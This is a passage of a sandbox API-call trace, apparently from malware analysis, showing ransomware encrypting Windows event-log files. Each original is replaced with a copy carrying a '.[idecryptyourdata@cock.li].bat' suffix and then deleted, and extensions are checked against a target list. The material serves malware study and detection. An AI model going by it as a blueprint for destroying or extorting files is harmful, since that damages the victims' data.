(lpFileName="C:\\Logs\\Microsoft-Windows-Bits-Client%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-bits-client%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0063.186] GetFileSizeEx (in: hFile=0x384, lpFileSize=0x2f8ff14 | out: lpFileSize=0x2f8ff14*=69632) returned 1 [0063.186] CloseHandle (hObject=0x384) returned 1 [0063.186] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Bits-Client%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-bits-client%4operational.evtx")) returned 0x20 [0063.186] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Bits-Client%4Operational.evtx.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\logs\\microsoft-windows-bits-client%4operational.evtx.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0063.186] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Bits-Client%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-bits-client%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0063.186] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f8fec0 | out: lpNewFilePointer=0x0) returned 1 [0063.186] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f8fec0 | out: lpNewFilePointer=0x0) returned 1 [0063.186] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Bits-Client%4Operational.evtx.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\logs\\microsoft-windows-bits-client%4operational.evtx.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388 [0063.186] GetLastError () returned 0x0 [0063.186] ReadFile (in: hFile=0x384, lpBuffer=0x3cf9020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2f8fecc, lpOverlapped=0x0 | out: lpBuffer=0x3cf9020*, lpNumberOfBytesRead=0x2f8fecc*=0x11000, lpOverlapped=0x0) returned 1 [0063.621] WriteFile (in: hFile=0x388, lpBuffer=0x3cf9020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x2f8fc94, lpOverlapped=0x0 | out: lpBuffer=0x3cf9020*, lpNumberOfBytesWritten=0x2f8fc94*=0x11010, lpOverlapped=0x0) returned 1 [0063.634] ReadFile (in: hFile=0x384, lpBuffer=0x3cf9020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2f8fecc, lpOverlapped=0x0 | out: lpBuffer=0x3cf9020*, lpNumberOfBytesRead=0x2f8fecc*=0x0, lpOverlapped=0x0) returned 1 [0063.634] WriteFile (in: hFile=0x388, lpBuffer=0x3cf9020*, nNumberOfBytesToWrite=0x132, lpNumberOfBytesWritten=0x2f8fc94, lpOverlapped=0x0 | out: lpBuffer=0x3cf9020*, lpNumberOfBytesWritten=0x2f8fc94*=0x132, lpOverlapped=0x0) returned 1 [0063.634] SetEndOfFile (hFile=0x388) returned 1 [0063.634] CloseHandle (hObject=0x388) returned 1 [0063.644] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f8fec0 | out: lpNewFilePointer=0x0) returned 1 [0063.644] SetEndOfFile (hFile=0x384) returned 1 [0063.645] CloseHandle (hObject=0x384) returned 1 [0063.645] SetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Bits-Client%4Operational.evtx.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0063.645] DeleteFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Bits-Client%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-bits-client%4operational.evtx")) returned 1 [0063.646] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Bits-Client%4Operational.evtx") returned 55 [0063.646] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Bits-Client%4Operational.evtx") returned 55 [0063.646] lstrlenW (lpString=".doc") returned 4 [0063.646] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0063.646] lstrlenW (lpString=".docx") returned 5 [0063.646] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0063.646] lstrlenW (lpString=".pdf") returned 4 [0063.646] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0063.646] lstrlenW (lpString=".xls") returned 4 [0063.646] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0063.646] lstrlenW (lpString=".xlsx") returned 5 [0063.646] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0063.646] lstrlenW (lpString=".ppt") returned 4 [0063.646] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0063.646] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Bits-Client%4Operational.evtx") returned 55 [0063.647] lstrlenW (lpString=".zip") returned 4 [0063.647] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0063.647] lstrlenW (lpString=".rar") returned 4 [0063.647] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0063.647] lstrlenW (lpString=".bz2") returned 4 [0063.647] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0063.647] lstrlenW (lpString=".7z") returned 3 [0063.647] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0063.647] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Bits-Client%4Operational.evtx") returned 55 [0063.647] lstrlenW (lpString=".dbf") returned 4 [0063.647] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0063.647] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Bits-Client%4Operational.evtx") returned 55 [0063.647] lstrlenW (lpString=".1cd") returned 4 [0063.647] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0063.647] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Bits-Client%4Operational.evtx") returned 55 [0063.647] lstrlenW (lpString=".jpg") returned 4 [0063.647] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0063.647] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Bits-Client%4Operational.evtx") returned 55 [0063.647] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Bits-Client%4Operational.evtx") returned 55 [0063.647] lstrlenW (lpString=".doc") returned 4 [0063.647] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0063.647] lstrlenW (lpString=".docx") returned 5 [0063.647] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0063.647] lstrlenW (lpString=".pdf") returned 4 [0063.647] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0063.647] lstrlenW (lpString=".xls") returned 4 [0063.647] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0063.647] lstrlenW (lpString=".xlsx") returned 5 [0063.647] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0063.647] lstrlenW (lpString=".ppt") returned 4 [0063.647] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0063.647] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Bits-Client%4Operational.evtx") returned 55 [0063.648] lstrlenW (lpString=".zip") returned 4 [0063.648] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0063.648] lstrlenW (lpString=".rar") returned 4 [0063.648] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0063.648] lstrlenW (lpString=".bz2") returned 4 [0063.648] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0063.648] lstrlenW (lpString=".7z") returned 3 [0063.648] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0063.648] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Bits-Client%4Operational.evtx") returned 55 [0063.648] lstrlenW (lpString=".dbf") returned 4 [0063.648] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0063.648] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Bits-Client%4Operational.evtx") returned 55 [0063.648] lstrlenW (lpString=".1cd") returned 4 [0063.648] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0063.648] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Bits-Client%4Operational.evtx") returned 55 [0063.648] lstrlenW (lpString=".jpg") returned 4 [0063.648] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0064.282] lstrcmpiW (lpString1=".evtx", lpString2=".bat") returned 1 [0064.282] lstrlenW (lpString="Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Admin.evtx") returned 78 [0064.282] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-devicemanagement-enterprise-diagnostics-provider%4admin.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x344 [0064.283] GetFileSizeEx (in: hFile=0x344, lpFileSize=0x2f8ff14 | out: lpFileSize=0x2f8ff14*=1052672) returned 1 [0064.283] CloseHandle (hObject=0x344) returned 1 [0064.283] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-devicemanagement-enterprise-diagnostics-provider%4admin.evtx")) returned 0x20 [0064.283] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Admin.evtx.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\logs\\microsoft-windows-devicemanagement-enterprise-diagnostics-provider%4admin.evtx.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0064.283] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-devicemanagement-enterprise-diagnostics-provider%4admin.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x344 [0064.283] SetFilePointerEx (in: hFile=0x344, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f8fec0 | out: lpNewFilePointer=0x0) returned 1 [0064.283] SetFilePointerEx (in: hFile=0x344, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f8fec0 | out: lpNewFilePointer=0x0) returned 1 [0064.283] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Admin.evtx.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\logs\\microsoft-windows-devicemanagement-enterprise-diagnostics-provider%4admin.evtx.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x358 [0064.283] GetLastError () returned 0x0 [0064.283] ReadFile (in: hFile=0x344, lpBuffer=0x3cf9020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2f8fecc, lpOverlapped=0x0 | out: lpBuffer=0x3cf9020*, lpNumberOfBytesRead=0x2f8fecc*=0xffff0, lpOverlapped=0x0) returned 1 [0064.303] WriteFile (in: hFile=0x358, lpBuffer=0x3cf9020*, nNumberOfBytesToWrite=0xffff0, lpNumberOfBytesWritten=0x2f8fc94, lpOverlapped=0x0 | out: lpBuffer=0x3cf9020*, lpNumberOfBytesWritten=0x2f8fc94*=0xffff0, lpOverlapped=0x0) returned 1 [0064.858] ReadFile (in: hFile=0x344, lpBuffer=0x3cf9020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2f8fecc, lpOverlapped=0x0 | out: lpBuffer=0x3cf9020*, lpNumberOfBytesRead=0x2f8fecc*=0x1010, lpOverlapped=0x0) returned 1 [0064.868] WriteFile (in: hFile=0x358, lpBuffer=0x3cf9020*, nNumberOfBytesToWrite=0x1020, lpNumberOfBytesWritten=0x2f8fc94, lpOverlapped=0x0 | out: lpBuffer=0x3cf9020*, lpNumberOfBytesWritten=0x2f8fc94*=0x1020, lpOverlapped=0x0) returned 1 [0064.872] ReadFile (in: hFile=0x344, lpBuffer=0x3cf9020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2f8fecc, lpOverlapped=0x0 | out: lpBuffer=0x3cf9020*, lpNumberOfBytesRead=0x2f8fecc*=0x0, lpOverlapped=0x0) returned 1 [0064.872] WriteFile (in: hFile=0x358, lpBuffer=0x3cf9020*, nNumberOfBytesToWrite=0x170, lpNumberOfBytesWritten=0x2f8fc94, lpOverlapped=0x0 | out: lpBuffer=0x3cf9020*, lpNumberOfBytesWritten=0x2f8fc94*=0x170, lpOverlapped=0x0) returned 1 [0064.872] SetEndOfFile (hFile=0x358) returned 1 [0064.872] CloseHandle (hObject=0x358) returned 1 [0065.919] SetFilePointerEx (in: hFile=0x344, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f8fec0 | out: lpNewFilePointer=0x0) returned 1 [0065.919] SetEndOfFile (hFile=0x344) returned 1 [0065.920] CloseHandle (hObject=0x344) returned 1 [0065.920] SetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Admin.evtx.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0065.921] DeleteFileW (lpFileName="C:\\Logs\\Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-devicemanagement-enterprise-diagnostics-provider%4admin.evtx")) returned 1 [0065.921] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Admin.evtx") returned 86 [0065.921] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Admin.evtx") returned 86 [0065.921] lstrlenW (lpString=".doc") returned 4 [0065.921] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0065.921] lstrlenW (lpString=".docx") returned 5 [0065.921] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0065.921] lstrlenW (lpString=".pdf") returned 4 [0065.921] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0065.921] lstrlenW (lpString=".xls") returned 4 [0065.921] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0065.921] lstrlenW (lpString=".xlsx") returned 5 [0065.921] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0065.921] lstrlenW (lpString=".ppt") returned 4 [0065.921] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0065.921] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Admin.evtx") returned 86 [0065.922] lstrlenW (lpString=".zip") returned 4 [0065.922] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0065.922] lstrlenW (lpString=".rar") returned 4 [0065.922] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0065.922] lstrlenW (lpString=".bz2") returned 4 [0065.922] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0065.922] lstrlenW (lpString=".7z") returned 3 [0065.922] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0065.922] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Admin.evtx") returned 86 [0065.922] lstrlenW (lpString=".dbf") returned 4 [0065.922] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0065.922] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Admin.evtx") returned 86 [0065.922] lstrlenW (lpString=".1cd") returned 4 [0065.922] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0065.922] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Admin.evtx") returned 86 [0065.922] lstrlenW (lpString=".jpg") returned 4 [0065.922] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0065.922] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Admin.evtx") returned 86 [0065.922] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Admin.evtx") returned 86 [0065.922] lstrlenW (lpString=".doc") returned 4 [0065.922] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0065.922] lstrlenW (lpString=".docx") returned 5 [0065.922] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0065.922] lstrlenW (lpString=".pdf") returned 4 [0065.922] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0065.922] lstrlenW (lpString=".xls") returned 4 [0065.922] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0065.922] lstrlenW (lpString=".xlsx") returned 5 [0065.922] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0065.922] lstrlenW (lpString=".ppt") returned 4 [0065.922] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0065.922] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Admin.evtx") returned 86 [0065.922] lstrlenW (lpString=".zip") returned 4 [0065.923] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0065.923] lstrlenW (lpString=".rar") returned 4 [0065.923] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0065.923] lstrlenW (lpString=".bz2") returned 4 [0065.923] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0065.923] lstrlenW (lpString=".7z") returned 3 [0065.923] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0065.923] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Admin.evtx") returned 86 [0065.923] lstrlenW (lpString=".dbf") returned 4 [0065.923] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0065.923] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Admin.evtx") returned 86 [0065.923] lstrlenW (lpString=".1cd") returned 4 [0065.923] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0065.923] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Admin.evtx") returned 86 [0065.923] lstrlenW (lpString=".jpg") returned 4 [0065.923] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0065.923] lstrcmpiW (lpString1=".evtx", lpString2=".bat") returned 1 [0065.923] lstrlenW (lpString="Microsoft-Windows-Known Folders API Service.evtx") returned 48 [0065.923] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Known Folders API Service.evtx" (normalized: "c:\\logs\\microsoft-windows-known folders api service.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x344 [0065.923] GetFileSizeEx (in: hFile=0x344, lpFileSize=0x2f8ff14 | out: lpFileSize=0x2f8ff14*=69632) returned 1 [0065.924] CloseHandle (hObject=0x344) returned 1 [0065.924] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Known Folders API Service.evtx" (normalized: "c:\\logs\\microsoft-windows-known folders api service.evtx")) returned 0x20 [0065.924] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Known Folders API Service.evtx.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\logs\\microsoft-windows-known folders api service.evtx.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0065.924] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Known Folders API Service.evtx" (normalized: "c:\\logs\\microsoft-windows-known folders api service.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x344 [0065.924] SetFilePointerEx (in: hFile=0x344, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f8fec0 | out: lpNewFilePointer=0x0) returned 1 [0065.924] SetFilePointerEx (in: hFile=0x344, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f8fec0 | out: lpNewFilePointer=0x0) returned 1 [0065.924] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Known Folders API Service.evtx.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\logs\\microsoft-windows-known folders api service.evtx.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a0 [0065.924] GetLastError () returned 0x0 [0065.924] ReadFile (in: hFile=0x344, lpBuffer=0x3cf9020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2f8fecc, lpOverlapped=0x0 | out: lpBuffer=0x3cf9020*, lpNumberOfBytesRead=0x2f8fecc*=0x11000, lpOverlapped=0x0) returned 1 [0065.926] WriteFile (in: hFile=0x3a0, lpBuffer=0x3cf9020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x2f8fc94, lpOverlapped=0x0 | out: lpBuffer=0x3cf9020*, lpNumberOfBytesWritten=0x2f8fc94*=0x11010, lpOverlapped=0x0) returned 1 [0065.928] ReadFile (in: hFile=0x344, lpBuffer=0x3cf9020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2f8fecc, lpOverlapped=0x0 | out: lpBuffer=0x3cf9020*, lpNumberOfBytesRead=0x2f8fecc*=0x0, lpOverlapped=0x0) returned 1 [0065.928] WriteFile (in: hFile=0x3a0, lpBuffer=0x3cf9020*, nNumberOfBytesToWrite=0x134, lpNumberOfBytesWritten=0x2f8fc94, lpOverlapped=0x0 | out: lpBuffer=0x3cf9020*, lpNumberOfBytesWritten=0x2f8fc94*=0x134, lpOverlapped=0x0) returned 1 [0065.928] SetEndOfFile (hFile=0x3a0) returned 1 [0065.929] CloseHandle (hObject=0x3a0) returned 1 [0065.931] SetFilePointerEx (in: hFile=0x344, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f8fec0 | out: lpNewFilePointer=0x0) returned 1 [0065.931] SetEndOfFile (hFile=0x344) returned 1 [0065.932] CloseHandle (hObject=0x344) returned 1 [0065.932] SetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Known Folders API Service.evtx.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0065.932] DeleteFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Known Folders API Service.evtx" (normalized: "c:\\logs\\microsoft-windows-known folders api service.evtx")) returned 1 [0065.933] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Known Folders API Service.evtx") returned 56 [0065.933] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Known Folders API Service.evtx") returned 56 [0065.933] lstrlenW (lpString=".doc") returned 4 [0065.933] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0065.933] lstrlenW (lpString=".docx") returned 5 [0065.933] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0065.933] lstrlenW (lpString=".pdf") returned 4 [0065.933] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0065.933] lstrlenW (lpString=".xls") returned 4 [0065.933] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0065.933] lstrlenW (lpString=".xlsx") returned 5 [0065.933] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0065.933] lstrlenW (lpString=".ppt") returned 4 [0065.933] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0065.933] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Known Folders API Service.evtx") returned 56 [0065.933] lstrlenW (lpString=".zip") returned 4 [0065.933] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0065.933] lstrlenW (lpString=".rar") returned 4 [0065.933] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0065.933] lstrlenW (lpString=".bz2") returned 4 [0065.933] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0065.933] lstrlenW (lpString=".7z") returned 3 [0065.933] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0065.934] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Known Folders API Service.evtx") returned 56 [0065.934] lstrlenW (lpString=".dbf") returned 4 [0065.934] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0065.934] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Known Folders API Service.evtx") returned 56 [0065.934] lstrlenW (lpString=".1cd") returned 4 [0065.934] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0065.934] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Known Folders API Service.evtx") returned 56 [0065.934] lstrlenW (lpString=".jpg") returned 4 [0065.934] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0065.934] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Known Folders API Service.evtx") returned 56 [0065.934] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Known Folders API Service.evtx") returned 56 [0065.934] lstrlenW (lpString=".doc") returned 4 [0065.934] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0065.934] lstrlenW (lpString=".docx") returned 5 [0065.934] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0065.934] lstrlenW (lpString=".pdf") returned 4 [0065.934] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0065.934] lstrlenW (lpString=".xls") returned 4 [0065.934] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0065.934] lstrlenW (lpString=".xlsx") returned 5 [0065.934] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0065.934] lstrlenW (lpString=".ppt") returned 4 [0065.934] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0065.934] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Known Folders API Service.evtx") returned 56 [0065.934] lstrlenW (lpString=".zip") returned 4 [0065.934] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0065.934] lstrlenW (lpString=".rar") returned 4 [0065.934] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0065.934] lstrlenW (lpString=".bz2") returned 4 [0065.934] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0065.935] lstrlenW (lpString=".7z") returned 3 [0065.935] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0065.935] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Known Folders API Service.evtx") returned 56 [0065.935] lstrlenW (lpString=".dbf") returned 4 [0065.935] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0065.935] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Known Folders API Service.evtx") returned 56 [0065.935] lstrlenW (lpString=".1cd") returned 4 [0065.935] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0065.935] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Known Folders API Service.evtx") returned 56 [0065.935] lstrlenW (lpString=".jpg") returned 4 [0065.935] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0065.935] lstrcmpiW (lpString1=".evtx", lpString2=".bat") returned 1 [0065.935] lstrlenW (lpString="Microsoft-Windows-LiveId%4Operational.evtx") returned 42 [0065.935] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-LiveId%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-liveid%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x344 [0065.936] GetFileSizeEx (in: hFile=0x344, lpFileSize=0x2f8ff14 | out: lpFileSize=0x2f8ff14*=69632) returned 1 [0065.936] CloseHandle (hObject=0x344) returned 1 [0065.939] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-LiveId%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-liveid%4operational.evtx")) returned 0x20 [0065.939] GetFileAttributesW 